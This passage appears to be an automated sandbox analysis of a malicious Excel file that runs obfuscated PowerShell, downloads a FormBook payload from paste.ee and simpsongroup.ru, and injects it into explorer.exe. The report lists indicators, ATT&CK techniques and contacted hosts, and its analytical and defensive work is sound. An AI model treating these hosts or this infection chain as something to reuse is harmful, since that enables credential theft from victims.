              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected FormBookShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.484194333.000000000084D000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.485540781.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.402683254.0000000000850000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.485890684.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.402620758.0000000000820000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.489324864.00000000035D7000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, type: DROPPED
              Source: Yara matchFile source: 18.0.qMBRkI.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.qMBRkI.exe.e30000.1.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              barindex
              Yara detected FormBookShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.484194333.000000000084D000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.485540781.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.402683254.0000000000850000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.485890684.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.402620758.0000000000820000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.489324864.00000000035D7000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, type: DROPPED
              Source: Yara matchFile source: 18.0.qMBRkI.exe.e30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.qMBRkI.exe.e30000.1.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting1Path InterceptionExtra Window Memory Injection1Deobfuscate/Decode Files or Information11Input Capture1File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsShared Modules1Boot or Logon Initialization ScriptsProcess Injection512Scripting1LSASS MemorySystem Information Discovery112Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information4Security Account ManagerQuery Registry1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationEncrypted Channel12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsCommand and Scripting Interpreter21Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery131Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
              Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsVirtualization/Sandbox Evasion4SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol114Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion4DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection512Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 372800 Sample: Purchase Order.xls Startdate: 22/03/2021 Architecture: WINDOWS Score: 100 49 www.sasayamagazine.com 2->49 51 www.cjmaeilnews.com 2->51 53 sasayamagazine.com 2->53 75 Found malware configuration 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 Multi AV Scanner detection for submitted file 2->79 81 8 other signatures 2->81 13 EXCEL.EXE 27 33 2->13         started        signatures3 process4 file5 43 C:\Users\user\...\Purchase Order.xls.LNK, MS 13->43 dropped 91 Suspicious powershell command line found 13->91 93 Obfuscated command line found 13->93 17 powershell.exe 15 22 13->17         started        signatures6 process7 dnsIp8 45 104.21.45.223, 443, 49744 CLOUDFLARENETUS United States 17->45 47 paste.ee 172.67.219.133, 49743, 80 CLOUDFLARENETUS United States 17->47 63 Very long command line found 17->63 65 Bypasses PowerShell execution policy 17->65 67 Powershell drops PE file 17->67 21 powershell.exe 17 17->21         started        25 conhost.exe 17->25         started        signatures9 process10 dnsIp11 55 simpsongroup.ru 45.95.183.230, 49754, 80 M247GB Germany 21->55 41 C:\Users\user\AppData\Local\Temp\qMBRkI.exe, PE32 21->41 dropped 27 qMBRkI.exe 21->27         started        file12 process13 signatures14 83 Antivirus detection for dropped file 27->83 85 Machine Learning detection for dropped file 27->85 87 Modifies the context of a thread in another process (thread injection) 27->87 89 4 other signatures 27->89 30 explorer.exe 27->30 injected process15 dnsIp16 57 anastasiamatkovskia.com 162.241.216.113, 49759, 80 UNIFIEDLAYER-AS-1US United States 30->57 59 www.thesongwriterschool.com 30->59 61 2 other IPs or domains 30->61 95 System process connects to network (likely due to code injection or exploit) 30->95 34 help.exe 30->34         started        signatures17 process18 signatures19 69 Modifies the context of a thread in another process (thread injection) 34->69 71 Maps a DLL or memory area into another process 34->71 73 Tries to detect virtualization through RDTSC time measurements 34->73 37 cmd.exe 1 34->37         started        process20 process21 39 conhost.exe 37->39         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Purchase Order.xls12%VirustotalBrowse
              Purchase Order.xls13%ReversingLabsScript.Trojan.Wacatac

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\qMBRkI.exe100%AviraTR/Crypt.ZPACK.Gen
              C:\Users\user\AppData\Local\Temp\qMBRkI.exe100%Joe Sandbox ML

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              18.1.qMBRkI.exe.e30000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              18.0.qMBRkI.exe.e30000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              18.2.qMBRkI.exe.e30000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

              Domains

              SourceDetectionScannerLabelLink
              anastasiamatkovskia.com0%VirustotalBrowse
              sasayamagazine.com0%VirustotalBrowse
              simpsongroup.ru0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://www.mercadolivre.com.br/0%URL Reputationsafe
              http://www.mercadolivre.com.br/0%URL Reputationsafe
              http://www.mercadolivre.com.br/0%URL Reputationsafe
              http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
              http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
              http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
              http://www.dailymail.co.uk/0%URL Reputationsafe
              http://www.dailymail.co.uk/0%URL Reputationsafe
              http://www.dailymail.co.uk/0%URL Reputationsafe
              http://www.instaespresso.com0%Avira URL Cloudsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.cjmaeilnews.comReferer:0%Avira URL Cloudsafe
              http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
              http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
              http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
              http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
              http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
              http://it.search.dada.net/favicon.ico0%URL Reputationsafe
              http://it.search.dada.net/favicon.ico0%URL Reputationsafe
              http://it.search.dada.net/favicon.ico0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              http://search.hanafos.com/favicon.ico0%URL Reputationsafe
              http://search.hanafos.com/favicon.ico0%URL Reputationsafe
              http://search.hanafos.com/favicon.ico0%URL Reputationsafe
              http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
              http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
              http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
              http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              http://buscar.ozu.es/0%Avira URL Cloudsafe
              http://search.auction.co.kr/0%URL Reputationsafe
              http://search.auction.co.kr/0%URL Reputationsafe
              http://search.auction.co.kr/0%URL Reputationsafe
              http://www.sasayamagazine.com/w8en/www.cjmaeilnews.com0%Avira URL Cloudsafe
              http://www.abhisclub.comReferer:0%Avira URL Cloudsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
              http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
              http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
              http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
              http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
              http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
              http://google.pchome.com.tw/0%URL Reputationsafe
              http://google.pchome.com.tw/0%URL Reputationsafe
              http://google.pchome.com.tw/0%URL Reputationsafe
              http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
              http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
              http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
              http://www.gmarket.co.kr/0%URL Reputationsafe
              http://www.gmarket.co.kr/0%URL Reputationsafe
              http://www.gmarket.co.kr/0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.anastasiamatkovskia.comReferer:0%Avira URL Cloudsafe
              https://paste.ee40%Avira URL Cloudsafe
              http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
              http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
              http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
              http://www.iask.com/0%URL Reputationsafe
              http://www.iask.com/0%URL Reputationsafe
              http://www.iask.com/0%URL Reputationsafe
              http://service2.bfast.com/0%URL Reputationsafe
              http://service2.bfast.com/0%URL Reputationsafe
              http://service2.bfast.com/0%URL Reputationsafe
              http://www.news.com.au/favicon.ico0%URL Reputationsafe
              http://www.news.com.au/favicon.ico0%URL Reputationsafe
              http://www.news.com.au/favicon.ico0%URL Reputationsafe
              http://www.kkbox.com.tw/0%URL Reputationsafe
              http://www.kkbox.com.tw/0%URL Reputationsafe
              http://www.kkbox.com.tw/0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              http://search.goo.ne.jp/favicon.ico0%URL Reputationsafe
              http://search.goo.ne.jp/favicon.ico0%URL Reputationsafe
              http://search.goo.ne.jp/favicon.ico0%URL Reputationsafe
              http://www.etmall.com.tw/0%URL Reputationsafe
              http://www.etmall.com.tw/0%URL Reputationsafe
              http://www.etmall.com.tw/0%URL Reputationsafe
              https://api.cortana.ai0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              paste.ee
              		172.67.219.133
              		truefalse
                		high
                anastasiamatkovskia.com
                		162.241.216.113
                		truetrueunknown
                sasayamagazine.com
                		150.95.52.106
                		truetrueunknown
                thesongwriterschool.com
                		34.102.136.180
                		truefalse
                  		unknown
                  simpsongroup.ru
                  		45.95.183.230
                  		truefalseunknown
                  www.sasayamagazine.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.thesongwriterschool.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.anastasiamatkovskia.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.cjmaeilnews.com
                        		unknown
                        		unknowntrue
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://search.chol.com/favicon.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                            		high
                            http://www.mercadolivre.com.br/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.dailymail.co.uk/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.instaespresso.comexplorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                              		high
                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                		high
                                https://rpsticket.partnerservices.getmicrosoftkey.com3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://lookup.onenote.com/lookup/geolocation/v13DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                  		high
                                  http://www.fontbureau.com/designersexplorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpfalse
                                    		high
                                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                      		high
                                      http://fr.search.yahoo.com/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                        		high
                                        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                          		high
                                          http://in.search.yahoo.com/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                            		high
                                            http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                              		high
                                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                		high
                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://msk.afisha.ru/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.cjmaeilnews.comReferer:explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://res.getmicrosoftkey.com/api/redemptionevents3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://tasks.office.com3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                    		high
                                                    http://www.ya.com/favicon.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://it.search.dada.net/favicon.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://store.office.cn/addinstemplate3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://search.hanafos.com/favicon.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                        		high
                                                        http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.odwebp.svc.ms3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://buscar.ozu.es/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                          		high
                                                          https://graph.windows.net3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                            		high
                                                            http://www.ask.com/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.google.it/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://search.auction.co.kr/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.amazon.de/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.sasayamagazine.com/w8en/www.cjmaeilnews.comexplorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://sads.myspace.com/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                                      		high
                                                                      http://www.abhisclub.comReferer:explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://ncus.contentsync.3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                                        		high
                                                                        http://weather.service.msn.com/data.aspx3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                                          		high
                                                                          http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://google.pchome.com.tw/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.rambler.ru/favicon.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                                              		high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                                                		high
                                                                                http://uk.search.yahoo.com/explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drfalse
                                                                                    		high
                                                                                    http://www.ozu.es/favicon.icoexplorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
